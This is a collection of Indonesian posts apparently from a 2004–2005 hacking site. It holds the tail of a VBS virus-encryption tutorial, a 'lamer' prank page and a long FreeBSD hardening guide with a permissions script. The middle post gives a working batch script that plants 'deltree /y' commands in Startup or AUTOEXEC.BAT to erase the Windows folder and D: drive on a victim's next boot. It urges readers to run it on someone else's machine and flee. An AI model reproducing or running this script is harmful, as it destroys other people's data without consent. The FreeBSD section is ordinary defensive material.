Sekian dulu tuturial enkripsi virus VBS ini sebagai jawaban atas semua email yang
menanyakan encryptor untuk virusnya sendiri. Dengan sedikit kreatif kamu bisa membuat encryptor kamu sendiri dari pengembangan encryptor di atas. Tutorial ini juga sebagai jawaban atas kurang jelasnya cara mengenkripsi virus yang terdapat saat ini. Terutama pada para pemula yang 'agak' butuh penjelasan panjang lebar.

Greet's to :
Indonesian Virus Writer dimana saja khususnya spidey yang suka membagi ilmunya hehehe.. :Þ~
SECTOR'S team,SevenC,dan pembuat virus VBS.Redlof dimanapun kamu berada.
Anak Warnet Payakumbuh(RiNaL,antho,alvin-s,peri,si bos,pak guru,yudi,ade dll)
MinangCrew, Kadal_Punk, Joehuntters, Aulia Abrar, Aldi_Member, Ridho(Elka02UNP), Adriyan, Bob dll.
Buat semua Anak Teknik Elektronika/Fakultas Teknik /UNP /Padang /SumBar /Indonesia.
Yance,Ee(toemis),Adek,Ata,Dodi(Bolot). hidup Payobasuang! dan yang tak tersebut namanya...

Salam.
Author  : maVero
Contact : em@ilku.net
CopyLEFT (c) 2005 www.spyrozone.net All Rights Reserved

Share:

Program Perusak Sang LAMER

Ini khusus buat para "Lamer sejati" yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!
Okay, ngga' usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat:
@echo off
echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat
echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat
atau
@echo off
echo deltree /y %windir%\*.*>> AUTOEXEC.BAT
echo deltree /y d:\*.*>> AUTOEXEC.BAT
wELL, ga' perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi... program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.
Author  : SPYRO KiD
Contact : admin[~@~]spyrozone.net || http://spyrozone.net
CopyLEFT (c) 2004++ www.spyrozone.net All Rights Reserved

Share:

STEP BY STEP FREEBSD

 [1] Intro

Tulisan ini tidak mewakili keseluruhan dari apa yang dibutuhkan dalam belajar sistem operasi FreeBSD, namun setidaknya dapat memberikan gambaran yang jelas bagaimana cara awal untuk memahami FreeBSD ini.

[2] Upgrade
[2.1] Ports Tree
Sebenarnya ini bukanlah hal yang sangat penting untuk dibicarakan, namun kenapa hal ini bisa dianggap sebagai sesuatu yang menarik? Ports adalah suatu fasilitas yang disediakan di sistem operasi BSD (Free,Open BSD) yang ditujukan untuk memudahkan user dalam menginstall atau mengupdate beberapa packages yang dibutuhkan sistem operasi.

Sangat mudah untuk melakukan instalasi ports-tree basic, anda cukup menulis perintah `sysinstall' didalam mesin BSD anda.

Contoh ports-supfile:
Shove all this in something like /root/port-supfile

*default host=cvsup7.FreeBSD.org
*default base=/usr
*default prefix=/usr
*default release=cvs tag=.
*default delete use-rel-suffix
ports-all

Sekarang anda masuk ke direktori /usr/ports/net/cvsup dan tulis perintah `make install clean' didalam konsol mesin anda. Setelah CVSup komplit lakukan dengan mengetikkan perintah
`cvsup -g -L 2 /root/port-supfile' perintah ini berfungsi untuk mengupgrade ports-tree anda.

Untuk lebih lengkapnya silahkan anda membaca artikel tentang bagaimana penggunaan ports didalam FreeBSD:
http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/ports-using.html

[2.2] OpenSSL
Normalnya ketika anda melakukan instalasi FreeBSD, mungkin anda telah melakukan instalasi terhadap paket openssl ini, namun biasanya versi yang ada bukanlah versi yang terbaru, untuk itu perlu melakukan upgrade OpenSSL. Download paketan openssl dari http://www.openssl.org kemudian segera lakukan instalasi:

[...]

./config
make
make test
make install

[...]


[2.3] OpenSSH Upgrade

Biasanya seperti yang terjadi dalam instalasi awal, seringkali dijumpai beberapa paket pendukung yang tidak up-to-date, termasuk OpenSSH, untuk itu segera lakukan upgrade dengan mendownload versi portable dari http://www.openssh.com/portable.html

[...]

./configure --prefix=/usr --sysconfdir=/etc/ssh
make; make install
make clean && make distclean

Edit /usr/local/etc/ssh/sshd_config

Protocol 2
ListenAddress 192.168.0.1 # Optional
ListenAddress 2000:ffff:ffff:ffff::1 # IPv6 supported
X11Forwarding no
PermitRootLogin no
Compression yes
MaxStartups 5

cp -f sshd_config /etc/ssh/sshd_config

Jalankan /usr/local/sbin/sshd

[...]

PS: Saya sebenarnya tidak menganjurkan untuk menginstall OpenSSH sebagai SSH servis didalam mesin anda, saya lebih suka menggunakan versi SSH2 Non Commercial, yang bisa anda install melalui ports yang sudah anda siapkan sebelumnya.


[3] System Permission

Sederhana sebenarnya, namun mengingat bahwa *NIX (disini kita berbicara FreeBSD) adalah bersifat multiuser, dalam artian kita tidak bisa secara langsung mengontrol segala aktifitas yang dilakukan oleh user yang berada didalam mesin kita, dengan kondisi seperti itu `root' akan memberikan batasan-batasan apa saja yang boleh dilakukan oleh user.

Biasanya root melakukan ini dengan menggunakan perintah `chown' atau `chmod' dan ini adalah sebagai perintah standar didalam *NIX. Namun FreeBSD menyediakan perintah yang lebih `powerfull' dari perintah standar diatas. Perintah tersebut adalah `chflags' disebut powerfull karena chflags mode tidak dapat dimodifikasi dengan akses securelevel >= 1 Untuk lebih lengkap dan lebih jauh tentang securelevel silahkan anda baca manual didalam konsol anda dengan mentikkan perintah `man securelevel'.

Bila root melakukan mode chflags /root/somefile ini akan memfungsikan `immutable flag' sehingga tidak bisa dilakukan perubahan atau penghapusan file tersebut selain akses root, untuk lebih detailnya silahkan baca manual tentang chflags didalam konsol anda dengan mengetikkan perintah `man chflags'.

Didalam sebuah sistem operasi, ada beberapa file dan direktori yang `tidak' boleh dilihat oleh user, anda hanya membutuhkan bagaimana user biasa tidak bisa membaca (mengakses) direktori tersebut (not file)

[...]

/bin
/sbin
/etc
/usr/local/bin
/usr/local/sbin
/usr/local/share
/usr/lib
/var
/var/log
/usr/local/lib
/usr/home
/usr/bin
/usr/sbin

[...]

Anda cukup melakukan perintah `chmod o-r




' maka semua isi didalam direktori tersebut tidak bisa dibaca
atau dilihat oleh user.


[4] Setting systcl

Tidak semua setingan didalam FreeBSD bisa anda dapatkan didalam Linux, jadi hanya meyakinkan anda untuk bertindak lebih bagus, atau mengetahui yang lebih bagus. Dibawah ini adalah petunjuk cepat bagaimana anda menyeting systcl

security.bsd.see_other_uids=0 # Will hide non-owned PIDs
net.inet.tcp.blackhole=2 # Allows greater protection via TCP in the kernel (still use ipfw)
net.inet.tcp.msl=7500 # I forget, but i believe its the rate a timed out packet lives. This is 1/2 the default.
net.inet.tcp.log_in_vain=1 # log all connections via TCP
net.inet6.ip6.forwarding=1
net.inet6.ip6.redirect=1
net.inet.udp.blackhole=1 # Allows greater protection of UDP
net.inet.udp.log_in_vain=1 # log all connections via UDP
net.inet.icmp.icmplim=50
net.inet.icmp.bmcastecho=0

Untuk lebih jauh tentang setingan systcl dalam sistem operasi FreeBSD, silahkan anda membaca didalam
freebsd-handbooks.


[5] End Of Chapter 1

Next Chapter:
mtree, rc.conf settings, packet sniffing, nmap, sftp vs ftp, ipfw


[6] References

- FreeBSD Security http://www.freebsd.org
- Google `as' your friend

Lampiran: FreeBSD Security Layout

#####################################################
#!/bin/sh
#FreeBSD Security Layout
#####################################################

if [ "$1" = "" ]; then
echo "FreeBSD General Security Layout - PLEASE EDIT SCRIPT TO YOUR NEEDS"
echo "Disclaimer: This script is not intended for end-all security measures, please add your"
echo " own custom settings for other boxes you deploy. Dont blame me if you get owned."
echo "Syntax: ./fbsd-sec.sh [-srRcSx]"
echo "Options:"
echo " -s Search for root setuid/setgid enabled programs and log to suid.orig and sgid.orig"
echo " -r Remove setuid/setgid bits in suid.kill and sgid.kill files."
echo " Be sure commmands you do use (su,passwd) are *NOT* removed."
echo " -R Restore removed setuid/setgid bits to suid.orig and sgid.orig files"
echo " -c Change general system permissions, add files to script if needed."
echo " You may also choose to remove some if you use some of the disabled utilities."
echo " -l Strip permissions from users to /var/log."
echo " -S Make changes to /etc/sysctl.conf. Feel free to edit that file. Reboot to take affect."
echo " -x Change to runlevel 1 (chflag bits cannot be removed)"
echo " It is best to do this step after you have fully finished setting up your system."
echo " You may choose to use a higher secure level: sysctl kern.securelevel=num - Read man securelevel"
exit 0
fi

# Search for setuid/setgid bits on the system owned by root
if [ $1 = "-s" ]; then
echo "Inputting setuid/setgid bits to ~/suid.orig and ~/sgid.orig... this may take awhile."
find / -perm -04000 -user root -print > ~/suid.orig
find / -perm -02000 -user root -print > ~/sgid.orig
echo "Remove commands you _USE_ from suid.orig and sgid.orig"
echo "Save as suid.kill and sgid.kill and keep .orig files in case of error"
exit 0
fi

# Remove setuid/setgid bits from suid.kill and sgid.kill files
if [ $1 = "-r" ]; then
cat ~/suid.kill | xargs chmod a-s
cat ~/sgid.kill | xargs chmod a-s
exit 0
fi

# Restore setuid/setgid bits from suid.orig and sgid.orig
if [ $1 = "-R" ]; then
cat ~/suid.orig | xargs chmod u+s
cat ~/sgid.orig | xargs chmod g+s
exit 0
fi

# Strip /var/log
if [ $1 = "-l" ]; then
chmod o-rw /var/log/*
echo "You should now change all user permissions to 0 in /etc/newsyslog.conf and restart syslogd"
exit 0
fi

# Goto securelevel 1
# Edit number to change value, see man securelevel before doing so be sure you understand this.
if [ $1 = "-x" ]; then
sysctl kern.securelevel=1
echo "To make a perminate change add: kern.securelevel=1 to your /etc/sysctl.conf"
echo "Since you have done this, you will not be able to modify your file flags - man chflags"
exit 0
fi

# Change sysctl.conf (do not edit function edit /etc/sysctl.conf)"
if [ $1 = "-S" ]; then
echo "" >> /etc/sysctl.conf
echo "# fbsd-sec.sh modifications" >> /etc/sysctl.conf
echo security.bsd.see_other_uids=0 >> /etc/sysctl.conf
echo net.inet.tcp.blackhole=2 >> /etc/sysctl.conf
echo net.inet.tcp.msl=7500 >> /etc/sysctl.conf
echo net.inet.tcp.log_in_vain=1 >> /etc/sysctl.conf
echo net.inet6.ip6.forwarding=1 >> /etc/sysctl.conf
echo net.inet6.ip6.redirect=1 >> /etc/sysctl.conf
echo net.inet.udp.blackhole=1 >> /etc/sysctl.conf
echo net.inet.udp.log_in_vain=1 >> /etc/sysctl.conf
echo net.inet.icmp.icmplim=50 >> /etc/sysctl.conf
echo net.inet.icmp.bmcastecho=0 >> /etc/sysctl.conf
echo "# end of fbsd-sec.sh mods" >> /etc/sysctl.conf
echo "If you enter this twice it will go into the config twice. Remove it if so."
exit 0
fi

# Change system file permissions (Now is a good time to take a good look at what this does

if [ $1 = "-c" ]; then
################ PLEASE BE SURE TO EDIT THIS AREA TO FIT YOUR SYSTEM NEEEDS#############
### THERE IS A COUPLE OF SETTINGS THAT MAY UNDO YOUR OWN THERE IS A REASON I DID IT ###
chmod o-r /bin
chmod o-r /sbin
chmod o-r /etc
chmod o-r /var
chmod o-r /usr/lib
chmod 500 /sbin/*
chmod o-r /usr/local/bin
chmod o-r /usr/local/sbin
chmod o-r /usr/local/lib
chmod o-r /usr/local/share
chmod go+rx /sbin/nologin
chmod 500 /usr/bin/at
chmod 500 /usr/bin/atq
chmod 500 /usr/bin/atrm
chmod 500 /usr/bin/batch
chmod 500 /usr/bin/btsockstat
chmod 500 /usr/bin/chfn
chmod 500 /usr/bin/chpass
chmod 500 /usr/bin/chsh
chflags schg /usr/bin/crontab
chmod 500 /usr/bin/cu
chmod 500 /usr/bin/doscmd
chmod 500 /usr/bin/finger
chmod 500 /usr/bin/fstat
chmod 500 /usr/bin/ipcs
chmod 500 /usr/bin/last
chmod 500 /usr/bin/logger
chflags schg /usr/bin/login
chmod 500 /usr/bin/lpq
chmod 500 /usr/bin/lpr
chmod 500 /usr/bin/lprm
chmod 500 /usr/bin/netstat
chown root:kmem /usr/bin/netstat
chown man:wheel /usr/bin/man
chmod g+s /usr/bin/man
chflags noschg /usr/bin/man
chmod 500 /usr/bin/nfsstat
chflags schg /usr/bin/opieinfo
chflags schg /usr/bin/opiepasswd
chflags schg /usr/bin/passwd
chmod 500 /usr/bin/rlogin
chflags schg /usr/bin/rlogin
chmod 500 /usr/bin/rsh
chflags schg /usr/bin/rsh
chmod 500 /usr/bin/sockstat
chmod o-rx /usr/bin/su
chflags schg /usr/bin/su
chflags schg /usr/bin/tip
chmod 500 /usr/bin/vmstat
chmod 500 /usr/bin/wall
chmod 500 /usr/sbin/arp
chgrp kmem /usr/sbin/iostat
chmod 000 /usr/sbin/lpc
chmod 550 /usr/sbin/mptable
chmod 000 /usr/sbin/ppp
chmod 000 /usr/sbin/pppd
chown root:kmem /usr/sbin/pstat
chmod 550 /usr/sbin/pstat
chmod g+s /usr/sbin/pstat
chmod 500 /usr/sbin/traceroute
chmod 500 /usr/sbin/traceroute6
chmod o-r /etc/login.conf
chmod o-r /etc/sysctl.conf
chmod o-r /etc/rc.conf
chmod o-r /etc/rc.conf.local
chflags schg /bin
chflags schg /sbin
chflags schg /sbin/*
chflags schg /usr/bin
chflags schg /usr/sbin
chflags schg /usr/lib
###### STOP EDITING HERE ######
exit 0
fi

Penyempurnaan dari tulisan FreeBSD for child akhir Desember 2003 Ditulis kembali pada awal Februari 2005
Selamat Belajar,
scut 

Author  : scut
Contact : scut@kecoak.or.id
CopyLEFT (c) 2005 www.spyrozone.net All Rights Reserved


 
Share: